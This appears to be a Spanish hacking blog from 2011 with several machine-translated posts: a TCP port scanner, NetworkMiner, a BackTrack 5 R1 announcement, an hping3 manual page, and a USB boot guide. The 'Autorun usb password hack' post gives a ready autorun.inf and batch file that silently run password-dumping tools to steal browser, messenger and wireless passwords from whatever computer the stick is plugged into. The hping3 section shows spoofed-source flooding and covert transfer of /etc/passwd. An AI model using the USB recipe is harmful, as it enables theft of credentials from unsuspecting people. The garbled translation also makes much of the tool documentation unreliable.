jueves, 29 de septiembre de 2011

TCP Scanner

Saludos Mundo Libre.


Hoy quiero hablar de una herramienta para las plataformas Windows Y Linux esta herramienta como el titulo dice se trata de un  es un Scanner Multi Threaded puerto TCP con posibilidad de escanear los puertos TCP 65535 en una dirección IP. Puede especificar cuántos subprocesos de ejecución y el tiempo de espera. Se le indicará la dirección MAC de la meta y el funcionamiento del servicio - funciona tanto en Linux como en Windows.


La versión 2.0 agrega las capacidades de escaneo SYN y mucho más:


Ha añadido la opción-s para SYN.
Escanear a una velocidad superior gracias a un sondeo SYN
Añadido aún más puertos por defecto
Controlador de errores de la mejora de SYN
La salida de texto mejorado
Fijo bugs menores


Una nueva rama del programa ha sido creado para apoyar SYN. SYN era necesario porque en algunas circunstancias de carga pesada, el TCP Connect scan puede colgar routers. El sondeo SYN es multiproceso y usa el cap de la biblioteca estándar en los sistemas operativos Unix / Linux. Tenga en cuenta que el sondeo SYN requiere un mayor nivel de autorización, si se compara con conectar tomas: en Unix / Linux pscan requiere privilegios de root. En algunos sistemas operativos, SYN se realiza mediante conexión "en bruto" tomas de corriente, por lo tanto, el uso de pscan está sujeto a posibles restricciones al uso de sockets en los sistemas operativos.


Con SYN, la opción-w no se utiliza debido a que el programa no utiliza conectores conectados, por lo que no tiene que leer un bucle zócalo hasta que el tiempo de espera que se alcance. La función de recepción no tiene que encuesta sobre una serie de tomas de corriente, sino que simplemente lee los paquetes que pasan a través de la tarjeta de red, para todos los puertos, y muestra el mensaje de "puerto abierto" cuando el paquete que viene de la dirección IP remota contiene la información que el puerto está abierto a distancia. Por la misma razón, las opciones-ay-n no se utilizan. La primera, porque los paquetes enviados a los puertos cerrados no son simplemente está respondiendo, por lo que no se puede contar, la segunda, porque la función que lee los paquetes es uno, y lleva a cabo mediante la lectura de los paquetes de la tarjeta de red, no de tomas múltiples.


La podremos descargar desde su pagina web


Descarga:


http://www.secpoint.com/Multi-Threaded-TCP-Port-Scanner.html

Fuente:

http://www.darknet.org.uk/

Traduccion:

Dellcom1@.




Saludos Mundo Libre.

lunes, 26 de septiembre de 2011

Network Miner


Saludos Mundo Libre.




Me he encontrado un poco Atariado pero aqui sigo en el mundo del hacking hoy les traigo una exelente herramienta.




NetworkMiner es una herramienta de análisis forense (NFAT) para Windows. NetworkMiner se puede utilizar como una red pasiva sniffer / paquete de herramienta de captura con el fin de detectar los sistemas operativos, las sesiones, los nombres de host, etc puertos abiertos sin poner ningún tráfico en la red. NetworkMiner también puede analizar los archivos PCAP para análisis fuera de línea y regenerar / ensamblar archivos transmitidos y los certificados de los archivos PCAP.


NetworkMiner recopila los datos (por ejemplo, las pruebas forenses) sobre las máquinas de la red en lugar de recoger datos sobre el tráfico en la red. La vista de la interfaz de usuario principal está centrado en host (información agrupada por host) en lugar de centrado en paquetes (información que se presenta como una lista de paquetes / cuadros).


NetworkMiner tiene, desde la primera versión en 2007, convertirse en una herramienta popular entre los equipos de respuesta a incidentes, así como aplicación de la ley. NetworkMiner que hoy es utilizado por empresas y organizaciones de todo el mundo.


Ha sido mucho tiempo desde la última vez que se menciona NetworkMiner, lo que era en 2008 - NetworkMiner - Sniffer pasivo y herramienta de análisis de paquetes para Windows.


Ahora hay una nueva versión!


Nueva en v1.1


La nueva versión soporta características tales como:


Extracción de datos de Google Analytics
Mejor análisis de los datos de SMB
Apoyo a las tramas PPP
Aún más estable que la versión 1.0


NetworkMiner Professional extracted files

NetworkMiner profesional al mostrar los archivos extraídos de olfateó el tráfico de red en el disco
NetworkMiner Professional extracted images and pictures
NetworkMiner profesional thumnails muestra de imágenes extraídas en el disco



Las credenciales de usuario (nombres de usuario y contraseñas) de los protocolos soportados son extraídos por NetworkMiner y se muestra en la "Credenciales" ficha. La ficha credenciales a veces también se muestra la información que se puede utilizar para identificar a una persona en particular, tales como cuentas de usuario para los servicios en línea como Gmail o Facebook.


Otra característica muy útil es que el usuario puede buscar inhala o se almacenan los datos de palabras clave. NetworkMiner permite al usuario insertar una cadena arbitraria o patrones de bytes que se buscó con la funcionalidad de búsqueda por palabra clave.

NetworkMiner profesional viene instalado en un diseño especial de la unidad flash USB. Puede ejecutar NetworkMiner directamente desde la unidad flash USB desde NetworkMiner es una aplicación portable que no requiere ningún istallation. Nosotros en Netresec, sin embargo, recomendamos que copie NetworkMiner para el disco duro local de su ordenador con el fin de lograr el máximo rendimiento.



NetworkMiner Professional USB flash drive
















Fuente:


Descarga: 


Traduccion: Dellcom1a

Saldos Mundo Libre

lunes, 19 de septiembre de 2011

backtrack 5 r1


Hola, BackTrack adicto.


Tenemos buenas noticias sobre la liberación de BackTrack 5 R1, cursos en vivo por la Seguridad ofensiva, nuestro azote nueva banda a medida ISO Builder y mucho más. Sigue leyendo para más información.


######################
BackTrack 5 R1 Lanzamiento
######################


Si aún no lo ha escuchado, BackTrack 5 r1 ha sido puesto en libertad. Este lanzamiento es un refinamiento de la anterior, con 120 correcciones de errores, 70 actualizaciones de la herramienta, y 30 nuevas herramientas añadido. El kernel ha sido actualizado a la 2.6.39.4 con todos los parches de inyección aplicada.


Asegúrese de dar con el sitio web (http://www.backtrack-linux.org/downloads/) para descargar su copia. Gnome y KDE 32 y 64 bits y una ISO de 32 bits Gnome VMWare imagen te están esperando. Como siempre, si te encuentras con problemas, por favor haga uso de nuestro Redmine interfaz (http://redmine.backtrack-linux.org:8080/) para informar de cualquier problema o una herramienta de cambios / adiciones que pueda necesitar.


############################################
Pruebas de Penetración con BackTrack en el Caribe
############################################


No pierdas la oportunidad de cortar en el paraíso con pruebas de penetración con BackTrack en el Caribe, celebrada en San Cristóbal (http://en.wikipedia.org/wiki/Saint_Kitts) 28 noviembre-2 diciembre!


Pruebas de Penetración con BackTrack es nuestro curso más popular, diseñado para administradores de red y profesionales de la seguridad que necesitan para conocer el mundo de la seguridad ofensiva. El uso intensivo de 5 días curso presenta las últimas herramientas de hacking y técnicas, e incluye laboratorios ricos para el ejercicio del material que se presenta a los estudiantes en un aula en vivo.


Situado a sólo un corto vuelo desde la Florida, hemos sido capaces de negociar una velocidad increíble, con un hotel de San Cristóbal base para poder ofrecer este lugar increíble para lo que viene a menos que la mayoría con sede en localidades. Todavía hay algunas plazas disponibles, así que asegúrese de revisar nuestra página de registro (http://www.offensive-security.com/live-information-security-training/pentesting-with-backtrack/). Pero date prisa antes de que se agota!


############################################
Advanced Windows explotación de cinco días de curso
############################################


Estamos entusiasmados de ofrecer a nuestros avanzados de Windows explotación de clase viven en Columbia MD 24 de octubre al 28. Los estudiantes que asisten a este curso deben tener un conocimiento muy agudo de desarrollo y explotación de tener unos pocos en su haber. Esto no es un curso de nivel básico y sólo podría ser la clase más graves de su tipo en el mercado hoy en día.


El curso cubre temas tales como Egghunters, Técnicas de pasar por NX, puntero de función Sobrescribe, Montón de pulverización, Escribiendo Plugins inmunidad, la codificación y la creación de Venecia shellcode shellcode personalizado. Este curso es muy práctico e incluye un entorno de laboratorio que está orientada a perseguir y poner lo mejor de usted. Los estudios de casos tratados incluyen las vulnerabilidades descubiertas por nuestro equipo de investigación, o exploits escritos por nosotros.


Esta es la primera vez que nos han ofrecido este curso fuera de Sombrero Negro, donde se llena día después de la apertura de registro. No te pierdas la oportunidad de asistir a este curso solicitado y firmar antes de que sea completo


##################################################
Costumbre BackTrack ISO Builder y Soporte Comercial
##################################################


Hemos lanzado un nuevo servicio de pago que permitirá la generación fácil, en línea hecha a la medida de las imágenes inversas. Los usuarios que necesiten construcción personalizada será capaz de usar una simple interfaz web para configurar y personalizar varios aspectos de BackTrack, tales como la selección de paquetes, gráficos, plantillas de pruebas de penetración, conductores, etc Estamos muy entusiasmados con este nuevo servicio, ya que proporcionará una oportunidad única para que las diversas organizaciones e individuos para crear ambientes únicos y personalizados BackTrack muy por primera vez. Un porcentaje de todos los beneficios de este servicio se dirigirá a Johnny Largos HFC (http://www.hackersforcharity.org/) del programa.


Junto con esto, también hemos lanzado un nuevo servicio que permitirá a las organizaciones grandes que requieren el apoyo oficial para desplegar BackTrack en sus redes, para hacer finalmente así. El Canal de soporte BackTrack permitirá la comunicación directa con nuestros desarrolladores para ayudar en la instalación de empresa fácil y procesos de implementación. El servicio inicialmente será proporcionada a las organizaciones de empresa.


Echa un vistazo a estos nuevos servicios en nuestra nueva web https://www.backtrack-linux.com/,.


Nunca el miedo sin embargo, ya que incluso con estos nuevos servicios comerciales en marcha, la seguridad de que estamos completamente comprometidos a un país libre, de código abierto BackTrack, para siempre. Esto no cambiará nunca. Esperamos que a través de nuestros servicios comerciales, que será capaz de financiar mejor BackTrack y (Dios no lo quiera), en realidad comenzar a pagar a nuestros desarrolladores para su tiempo y esfuerzo.

lunes, 12 de septiembre de 2011

hping3

Saludos Mundo Libre.


Descripción

hping3 es una herramienta de red capaz de enviar costumbre paquetes TCP / IP y para mostrar las respuestas del objetivo, como el programa de ping hace de las respuestas de ICMP. hping2 fragmentación de manejar, el cuerpo de los paquetes arbitrarios y tamaño y se puede utilizar para transferir archivos encapsulados en los protocolos soportados. Utilizando hping3 que son capaces de realizar al menos las siguientes cosas:

- Las reglas de firewall de prueba - el escaneo de puertos avanzada - Realización de un ensayo de red utilizando diferentes protocolos, tamaño de los paquetes, TOS (tipo de servicio) y la fragmentación. - Descubrimiento de ruta MTU - Transferencia de archivos entre las reglas del cortafuegos, incluso realmente fascista. - Traceroute-como en los diferentes protocolos. - Firewalk-como el uso. - Remote OS fingerprinting. - TCP / IP stack de auditoría. - Una gran cantidad de otros.

También es una buena herramienta didáctica para aprender TCP / IP. hping2 es desarrollado y mantenido por antirez@invece.org y está licenciado bajo GPL versión 2. El desarrollo es abierto, así que me puede enviar los parches, la sugestión y afrentas sin inhibiciones.

Sitio Hping

sitio principal en http://www.hping.org. Usted puede encontrar tanto en la versión estable y la instrucción para descargar el último código fuente en http://www.hping.org/download.html

Opciones de Base

-H - help

Mostrar una pantalla de ayuda en la salida estándar, por lo que se pueden canalizar al menos.
-V - version
Mostrar información sobre la versión y el API utilizado para acceder a la capa de enlace de datos, paquetes linux calcetín o libpcap.
-C - Recuento
Parar después de enviar (y recibir) count paquetes de respuesta. Después de el último paquete fue enviado hping2 espere unos segundos COUNTREACHED_TIMEOUT objetivo de los hosts. Usted es capaz de sintonizar COUNTREACHED_TIMEOUT hping2.h edición
-I - intervalo de
Espera el número especificado de segundos o micro segundos entre el envío de cada paquete. - Intervalo de X establece la hora de X segundos, - intervalo uX establecer la hora de X segundos micro. El valor predeterminado es de esperar un segundo entre cada paquete. Utilizando hping2 para transferir archivos sintonizar esta opción es muy importante para aumentar la velocidad de transferencia. Incluso el uso de hping2 para realizar reposo / suplantación de digitalización que debe sintonizar esta opción, consulte hping2-HOWTO para más información.
- Rápido
Alias ​​para el i-u10000. Hping enviará 10 paquetes por segundo.

- Más rápido
Alias ​​para-i u1. Más rápido que - rápido;) (pero no tan rápido como su computadora pueda enviar paquetes debido al diseño de la señal-driven).
- Inundaciones
Enviado paquetes lo más rápido posible, sin atender a mostrar respuestas entrantes. Esta es la forma más rápida que para especificar la opción-i u0.
-N - numérico
Sólo salida numérica, no se intentará de buscar nombres simbólicos para las direcciones host.
-Q - quiet
Salida tranquila. No se muestra nada, excepto las líneas de resumen al comenzar y al terminar.
-I - interface nombre de la interfaz
Por defecto en Linux y sistemas BSD hping2 utiliza la interfaz de enrutamiento por defecto. En otros sistemas, o cuando no hay hping2 ruta predeterminada utiliza la primera interfaz de bucle invertido no. Sin embargo, usted es capaz de obligar a hping2 utilizar la interfaz es necesario utilizar esta opción. Nota: no es necesario especificar el nombre del conjunto, por ejemplo-I et coinciden eth0 ethernet0 myet1 etcétera. Si no hay interfaces coincidan hping2 tratará de usar lo.
-V - verbose
Activar una salida prolija. Respuestas TCP se muestra a continuación:
len = 46 ip = 192.168.1.1 flags = RA seq = 0 DF ttl = 255 id = 0 = 0 rtt ganar = 0,4 ms tos = 0 iplen = 40 ss = 0 = ack 1380893504 = suma de 2010 URP = 0

-D - debug
Activar el modo de depuración, es útil cuando usted experimenta algún problema con hping2. Cuando el modo de depuración está habilitado obtendrá más información sobre la detección de interfaz, acceso a los datos de capa de enlace, configuración de la interfaz, el análisis de opciones, la fragmentación, el protocolo HCMP y otras cosas.
-Z - bind
CTRL + Z se unen con el tiempo de vida (TTL) para que se pueda para aumentar / disminuir ttl de los paquetes de salida pulsando CTRL + Z una o dos veces.
-Z - desvincular
Desenlace CTRL + Z para que se pueda dejar de hping2.
- Bip
Pitido por cada juego recibió un paquete (pero no de los errores ICMP).

Selección del protocolo

Protocolo por defecto es TCP, por defecto hping2 enviará cabeceras de TCP para apuntar 0 anfitrión de puerto con un winsize de 64 años sin ninguna bandera en tcp. A menudo, esta es la mejor manera de hacer un 'ping ocultar ", útiles cuando el objetivo está detrás de un firewall que la caída de ICMP. Además, un TCP null-bandera en el puerto 0 tiene una buena probabilidad de que no se ha autentificado.

-0 - RawIP
El modo RAW IP, en este modo de hping2 enviará encabezado IP con datos adjuntos con - firma y / o - file, véase también - ipproto que le permite establecer el campo de protocolo IP.
-1 - Icmp
Modo de ICMP, por defecto hping2 enviará ICMP echo-request, se puede establecer otros ICMP tipo / código usando opciones - icmpcode - icmptype.
-2 - Udp
El modo UDP, por defecto hping2 enviará al objetivo puerto udp anfitrión 0. UDP opciones de la cabecera ajustables son los siguientes: - baseport, - DestPort, - keep.
-8 - Exploración
El modo de exploración, la opción de espera un argumento que describe grupos de puertos a escanear. grupos de apoyo están separados por coma: una serie describe sólo un único puerto, por lo que significa puerto 1,2,3 1, 2 y 3. rangos se especifican utilizando una notación principio-fin, como 1000-1000, que cuentan hping de análisis de puertos entre 1 y 1000 (incluido). la palabra especial a todos es un alias de 0 a 65.535, mientras que la palabra especial conocido incluye todos los puertos que figuran en / etc / services.
Los grupos pueden ser combinados, por lo que la línea de comandos siguiente análisis de puertos de entre 1 y 1000 y el puerto 8888 y los puertos que figuran en / etc / services: hping - exploración 1-1000,8888, conocido-S target.host.com
Los grupos pueden ser negados (resta) con un! carácter como prefijo, por lo que la siguiente línea de comandos buscará todos los puertos que no estén listados en / etc / services en el rango 1-1024: hping - exploración '1 -1024, conocido '-S target.host.com
Tenga en cuenta que mientras hping parece mucho más a un escáner de puertos en este modo, la mayoría de los interruptores hping siguen siendo honrados, por lo que, por ejemplo, para llevar a cabo un sondeo SYN es necesario especificar la opción-S, puede cambiar el tamaño de las ventanas TCP , TTL, el control de la fragmentación de IP como de costumbre, y así sucesivamente. La única diferencia real es que los comportamientos hping estándar se encapsulan en un algoritmo de escaneo.
Nota técnica: El modo de análisis utiliza un diseño de dos procesos, con memoria compartida para la sincronización. El algoritmo de escaneo aún no es óptima, pero ya bastante rápido.
Sugerencia: a diferencia de la mayoría de los escáneres, hping muestra algo de información interesante acerca de los paquetes recibidos, el ID de IP, TCP ganar, TTL, y así sucesivamente, no te olvides de buscar esta información adicional cuando se realiza una exploración! A veces se muestra detalles interesantes.
-9 - Escuchar la firma
Hping2 modo de escucha, con esta opción hping2 espera de paquetes que contienen la firma y el volcado de la firma final para poner fin a paquete. Por ejemplo, si hping2 - escuchar TEST lee un paquete que contiene 234 09sdflkjs45-TESThello_world se mostrará hola_mundo.
Opciones IP relacionados

-A - nombre falso

Utilice esta opción con el fin de establecer una dirección IP de origen falso, esta opción asegura que se dirigen no va a ganar su dirección real. Sin embargo, las respuestas se enviarán a la dirección falsa, por lo que no puede ver. Con el fin de ver cómo es posible realizar una exploración falsa / inactivo ver el hping2-HOWTO.
- Rand-fuente
Esta opción permite que el modo de fuente aleatoria. hping envíe paquetes con dirección de origen aleatorio. Es interesante usar esta opción para el estrés tablas firewall del Estado, y otros por las tablas de ip dinámica dentro de la base de pilas TCP / IP y el software de firewall.
- Rand-dest
Esta opción activa el modo aleatorio de destino. hping enviará los paquetes a direcciones al azar obtenidos después de la regla que especifica que el host de destino. Es necesario especificar una dirección IP numérica como host de destino como 10.0.0.x. Todas las ocurrencias de x será reemplazado por un número aleatorio en el rango 0-255. Así que para obtener las direcciones IP de Internet en todo el IPv4 algo utilizar el espacio como hping xxxx - rand-dest. Si usted no está seguro sobre qué tipo de direcciones de tu regla es la generación de tratar de usar la opción - de depuración para mostrar cada nueva dirección de destino generado. Cuando esta opción está activada, los paquetes que coinciden se acepta de todos los destinos.
Advertencia: cuando esta opción está activada hping no puede detectar la interfaz de salida adecuada para los paquetes, lo que debe utilizar la opción - interface para seleccionar la interfaz de salida deseada.
-T - ttl tiempo para vivir
Con esta opción se puede establecer TTL (Time To Live) de los paquetes de salida, lo más probable es que va a utilizar esto con - o traceroute - opciones de vinculación. En caso de duda tratar de 'hping2 some.host.com-t 1 - traceroute'.
-N - Identificación
Set ip-> campo id. Identificación del valor por defecto es al azar, pero si la fragmentación se enciende y la identificación no se ha especificado que se getpid () y 0xFF, para implementar la mejor solución está en la lista TODO.
-H - ipproto
Establecer el protocolo IP en modo IP RAW.
-W - WinID
Identificación de los sistemas Windows * antes de Win2k ha byte diferente orden, si esta opción es permitir que hping2 mostrará correctamente respuestas Identificación de las ventanas.
-R - rel
Mostrar incrementos de Identificación del lugar de id. Ver el hping2-HOWTO para más información. Incrementos no se calculan como id [N]-id [N-1], sino mediante la compensación de la pérdida de paquetes. Ver relid.c para más información.
-F - fragmento
Dividir los paquetes en fragmentos más, esto puede ser útil para poner a prueba el rendimiento de fragmentación IP pilas y para comprobar si algún filtro de paquetes es tan débil que puede pasar con pequeños fragmentos (anacrónica). Por defecto "virtual MTU es de 16 bytes. véase también la opción - mtu.
-X - morefrag
Conjunto más bandera fragmentos IP, utilice esta opción si desea que el host de destino envía un ICMP de tiempo excedido durante el rearmado.
-Y - dontfrag
Conjunto no marca fragmento IP, esto se puede utilizar para realizar el descubrimiento MTU camino.
-G - fragoff fragmento valor de desplazamiento
Ajuste el offset del fragmento.
-M - Valor MTU MTU
Conjunto diferente "virtual MTU de 16 cuando la fragmentación está activado. Si el tamaño de los paquetes es mayor que la fragmentación "virtual mtu" se activa automáticamente.
-O - ​​hex_tos tos
Configurar el tipo de servicio (TOS), para tratar de obtener más información - ayuda tos.
-G - rroute
Registro de ruta. Incluye la opción RECORD_ROUTE en cada paquete enviado y muestra el buffer de ruta de los paquetes devueltos. Tenga en cuenta que la cabecera IP es lo suficientemente grande para nueve rutas de este tipo. Muchos anfitriones ignorar o descartar esta opción. También tenga en cuenta que el uso de hping que son capaces de utilizar registro de ruta, incluso si el host de destino filtro ICMP. Registro de ruta es una opción IP no es una opción ICMP, por lo que se puede utilizar la opción de registro de ruta, incluso en el TCP y UDP modo.
Icmp Opciones relacionadas

-C - Tipo icmptype

Establecer el tipo de icmp, por defecto es solicitud de eco ICMP (implica - ICMP).
-K - icmpcode código
Conjunto de códigos ICMP, por defecto es 0 (implica - ICMP).
- Icmp-ipver
Establecer IP versión de la cabecera IP contenida en los datos de ICMP, por defecto es 4.
- Icmp-iphlen
Ajustar la longitud de la cabecera IP de la cabecera IP que figuran en los datos de ICMP, por defecto es de 5 (cinco palabras de 32 bits).
- Icmp-iplen
Ajustar la longitud de paquetes IP de la cabecera IP contenida en los datos de ICMP, por defecto es la longitud real.
- Icmp-IPID
Identificación del conjunto de IP de la cabecera IP que figuran en los datos de ICMP, por defecto es al azar.
- Icmp-ipproto
Establecer el protocolo IP de la cabecera IP que figura en los datos de ICMP, por defecto es TCP.
- Icmp-cksum
Set de control ICMP, por defecto es la suma de comprobación válido.
- Icmp-ts
Alias ​​para - icmptype 13 (para enviar peticiones ICMP timestamp).
- Icmp-addr
Alias ​​para - icmptype 17 (para enviar peticiones ICMP de máscara de dirección).
TCP / UDP OPCIONES RELACIONADAS

-S - puerto baseport fuente

hping2 utiliza el puerto de origen con el fin de adivinar respuestas número de secuencia. Se inicia con un número de la base del puerto de origen, y aumentar este número para cada paquete enviado. Cuando se recibe el paquete número de secuencia se puede computar como replies.dest.port - base.source.port. Base por defecto el puerto de origen es al azar, utilizando esta opción usted puede configurar un número distinto. Si necesita que el puerto de origen no se incrementará por cada paquete que se envía el uso de la k-- mantener la opción.
-P - DestPort [+][+] dest puerto
Configure el puerto de destino, por defecto es 0. Si carácter '+' precede a dest número de puerto (es decir, 1024) puerto de destino se incrementará por cada respuesta recibida. Si al hacer doble '+' precede a dest número de puerto (es decir, + 1024), puerto de destino se incrementa por cada paquete enviado. Por el puerto de destino por defecto se puede modificar de forma interactiva usando CTRL + z.
- Mantener
mantener todavía el puerto de origen, ver - baseport para más información.

-W - win
Establecer el tamaño de la ventana TCP. Por defecto es 64.
-O - ​​tcpoff
Conjunto de datos falsos tcp offset. Normal de los datos de desplazamiento es tcphdrlen / 4.
-M - tcpseq
Establecer el número de secuencia TCP.
-L - tcpack
Establecer el TCP ACK.
-Q - SeqNum
Esta opción se puede utilizar con el fin de recoger números de secuencia generado por el host de destino. Esto puede ser útil cuando es necesario analizar si el número de secuencia TCP es predecible. Ejemplo de salida:
# Hping2 win98 - SeqNum-p 139-S-i u1-I eth0

Hping UAZ (eth0 192.168.4.41): conjunto S, 40 cabeceras + 0 bytes de datos
2361294848 +2361294848
2411626496 +50331648
2545844224 +134217728
2713616384 +167772160
2881388544 +167772160
3049160704 +167772160
3216932864 +167772160
3384705024 +167772160
3552477184 +167772160
3720249344 +167772160
3888021504 +167772160
4055793664 +167772160
4223565824 +167772160
La primera columna muestra el número de secuencia, la segunda diferencia entre el número de secuencia actual y pasado. Como usted puede ver los números de secuencia de host de destino son predecibles.
-B - badcksum
Enviar paquetes con una mala UDP / TCP checksum.
- Tcp-fecha y hora
Active la opción TCP timestamp, y tratar de adivinar la frecuencia de actualización de fecha y hora y el tiempo de actividad del sistema remoto.
-F - fin
Conjunto TCP FIN bandera.
-S - syn
Conjunto TCP SYN bandera.
-R - rst
RST TCP bandera.
-P - push
La opción Push indicador TCP.
-A - ack
Ajuste ACK indicador TCP.
-U - urg
Establecer URG tcp bandera.
-X - xmas
Set de Navidad tcp bandera.
-Y - ymas
Establecer Ymas tcp bandera.
Las opciones comunes

-D - los datos de tamaño de los datos

Establecer el tamaño del paquete de cuerpo. De advertencia, utilizando - 40 hping2 datos no generará 0 paquetes de bytes, pero 40 bytes protocol_header. hping2 mostrará la información de los paquetes de tamaño como de salida de la primera línea, por ejemplo: www.yahoo.com hping (ppp0 204.71.200.67): no hay banderas se establecen, de 40 cabeceras + 40 bytes de datos
-E - nombre del archivo
Su utilización nombre de archivo para rellenar los datos del paquete.
-E - firma signo
Primer llenado bytes longitud de la firma de datos con la firma. Si la longitud de la firma es más grande que el tamaño de los datos de un mensaje de error en la pantalla. Si no se especifica el tamaño de los datos hping utilizará el tamaño de la firma como el tamaño de los datos. Esta opción se puede utilizar de forma segura con el - nombre de archivo archivo de opciones, el resto de datos del espacio se llena con nombre de archivo.
-J - dump
Volcado de los paquetes recibidos en hexadecimal.
-J - Imprimir
Volcado recibieron paquetes de caracteres imprimibles.
-B - seguro
Habilitar el protocolo de seguridad, uso de esta opción pérdida de paquetes en la transferencia de archivos se resienten. Por ejemplo, para enviar el archivo / etc / passwd del host A al host B, usted puede utilizar lo siguiente:
[HOST_A]
# Hping2 HOST_B - udp-p 53-d 100 - firma signo - seguro - archivo / etc / passwd
[HOST_B]
# Hping2 HOST_A - escuchar la firma - seguro - icmp
-U - final
Si está utilizando la opción - archivo de nombre de archivo, le dirá cuando EOF se ha alcanzado. Por otra parte evitar que el otro extremo aceptar más paquetes. Por favor, para más información, consulte la hping2-HOWTO.
-T - traceroute
Traceroute modo. El uso de este hping2 opción aumentará ttl por cada vez que ICMP para vivir 0 durante el tránsito recibido. Trate de hping2 anfitrión - traceroute. Esta opción implica - y se unen - ttl 1. Se puede reemplazar el TTL de 1, utilizando la opción - ttl. 2.0.0 estable desde que se imprime la información RTT.
- Tr-keep-ttl
Mantener el TTL fija en el modo de traceroute, lo que puede controlar sólo un salto en la ruta. Por ejemplo, para supervisar cómo los cambios hop quinto o cómo su RTT cambios que usted puede intentar hping2 anfitrión - traceroute - ttl 5 - tr-keep-ttl.
- Tr-parada
Si se especifica esta opción hping saldrá una vez que el primer paquete que no es un tiempo superado de ICMP se recibe. Más vale que emula el comportamiento de traceroute.
- Tr-no-rtt
No mostrar información de RTT en el modo de traceroute. El ICMP de tiempo excedido información RTT ni siquiera calculado si se establece esta opción.
- Tcpexitcode
Salida con el último paquete recibido tcp-> th_flag como código de salida. Útil para los scripts que necesitan, por ejemplo, para conocer si el puerto 999 de un host con respuesta SYN / ACK o RST en respuesta al SYN, es decir, el servicio está arriba o abajo.
TCP Formato de salida

El formato estándar de TCP de salida es el siguiente:

len = 46 ip = 192.168.1.1 flags = RA seq = 0 DF ttl = 255 id = 0 = 0 rtt ganar = 0,4 ms

len es el tamaño en bytes de los datos capturados de la capa de enlace de datos excepto el tamaño del encabezado de enlace de datos. Esto puede no coincidir con el tamaño de datagrama IP debido a la capa de relleno de bajo nivel de transporte.

IP es la dirección IP de origen.

las banderas son las banderas TCP, R de RESET, S de SYN, ACK A de F, para FIN, P para PUSH, U de URGENTE, X de 0x40 no estándar, Y de 0x80 no estándar.

Si la respuesta contiene DF la cabecera IP tiene el conjunto de bits No fragmentar.

ss es el número de secuencia del paquete, que se obtiene utilizando el puerto de origen para los paquetes TCP / UDP, el campo de la secuencia de los paquetes ICMP.

id es el campo ID de IP.

ganar es el tamaño de la ventana TCP.

RTT es el tiempo de ida y vuelta en milisegundos.

Si ejecuta hping utilizando el comando-V modificador de la línea, se mostrará información adicional sobre el paquete, por ejemplo:

len = 46 ip = 192.168.1.1 flags = RA seq = 0 DF ttl = 255 id = 0 = 0 rtt ganar = 0,4 ms tos = 0 iplen = 40 ss = ack 0 = 1223672061 = suma e61d URP = 0

tos es el tipo de servicio de campo de la cabecera IP.

iplen es el campo IP len total.

ss y ACK son la secuencia de números de 32 bits y reconocer en la cabecera TCP.

suma es el valor de la suma de cabecera TCP.

URP es el valor de puntero urgente TCP.

UDP Formato de salida

El formato de salida estándar es:

len = 46 ip = 192.168.1.1 seq = 0 ttl = 64 id = 0 rtt = 6.0 ms

El significado de campo es el mismo que el significado de salida TCP de los mismos campos.

Formato de salida ICMP

Un ejemplo de salida de ICMP es la siguiente:

ICMP Port Unreachable de ip 192.168.1.1 = name = nano.marmoc.net

Es muy sencillo de entender. Se inicia con la cadena "ICMP", seguido de la descripción del error ICMP, Port Unreachable en el ejemplo. El campo ip es la dirección IP de origen de los datagramas IP que contiene el error ICMP, el campo de nombre es la dirección numérica resolverá en un nombre (una petición DNS PTR) o desconocido, si la resolución no.

El ICMP de tiempo excedido en tránsito o en formato de montaje es un poco diferente:

TTL 0 durante el tránsito de la ip 192.168.1.1 = name = nano.marmoc.net

TTL 0 durante el reensamblado de IP = 192.70.106.25 name = DESCONOCIDO

La única diferencia es la descripción del error, se inicia con TTL 0.

Saludos Mundo Libre.

sábado, 10 de septiembre de 2011

Autorun usb passwork hack

Saludos Mundo Libre.

He aquí la creación de un usb password hacking

Archivos necesarios


1. 1.exe, 2.exe, 3.exe, 4.exe, 5.exe
2. autorun.inf
3. launch.bat

Creando auto run info.


--> [autorun]
--> shellexecute=launch.bat
--> ACTION = System

File name : autorun.inf
Salvamos todo como un archivo.

Creando el archivo.bat



--> @start 1.exe /shtml "IEPassView.html" >NUL
--> @start 2.exe /shtml "MSNPass.html" >NUL
--> @start 3.exe /shtml "Processen.html" >NUL
--> @start 4.exe /shtml "pspvPass.html" >NUL
--> @start 5.exe /shtml "WirelessKey.html" >NUL


/shtml "Filename.html"  Salvamos el pasword como  Html Archivo.
es posible cambiar este comando si puedes cambiar el nombre del archivo.

Los Archivos : 1.exe, 2.exe, 3.exe, 4.exe, 5.exe

los descargamos desde:

http://www.mediafire.com/?000inanqtom


Poner todos los archivos en una unidad USB.
Enchufarlo en un ordenador y tendrá todas las contraseñas
que quieres en tu unidad USB.



Fuente:
http://www.xtremeroot.net/Offensive/index.php?showtopic=49174

Traduccion: Dellcom1@

Saludos Mundo Libre.





lunes, 5 de septiembre de 2011

Corriendo Windows XP en un usb

Saludos Mundo Libre.


Hay tantos Linux viene con CD en vivo. Esta es una forma alternativa para aquellos que no quiere instalar Linux en su disco duro. El CD en vivo convertido en un solucionador de problemas cuando el sistema solía arrancar o algo sucedió con el sistema y se puede rescatar los archivos con el CD. Al lado de los CDs, uno de los más que conocidos DSL Linux llamada se viene con USB directo maldita! Tenga en cuenta que este método requiere una computadora que tiene capacidad para arrancar desde dispositivos USB.



Por la oportunidad, escuché algo acerca de Windows XP en directo en un disco USB flash. Esto es mucho más interesante para mí y me gustaría que intentó. En cuestión de segundos, se produjo un enlace seguro a que se refiere la página de descarga de Google. Su tamaño es de 54MB y el enlace está aquí.


Después de haber descargado por completo, los paquetes se extraen con WinRAR ~ ya que está comprimido en formato RAR de alguna manera. Finalmente, hay 7 archivos extraídos de la misma. Los 2 primeros archivos son los manuales en Alemania y en ruso. Es posible que no encuentra la documentación en Inglés, porque se parece BartPE desarrollado por un Alemania. En primer lugar, tenemos que proporcionar una memoria USB con el tamaño mínimo de 256 MB. Entonces, hacer un nuevo formato rápido con la herramienta hpusbfw.exe incluye en los paquetes. Ver la foto de abajo.




xpusb1.jpg


Después de que el proceso de formato hecho, reinicie el sistema y asegúrese de activar la secuencia de arranque USB desde la BIOS ~ mientras que el disco USB aún enchufado Deja que el ordenador arranca desde el mismo y se muestra un proceso de arranque en el monitor. Los procesos de arranque está tomando mucho tiempo dependerá de la velocidad de almacenamiento USB, por lo que sería genial si también está preparando un café y un cigarrillo durante la espera en el escritorio a aparecer.



xpusb2.jpg

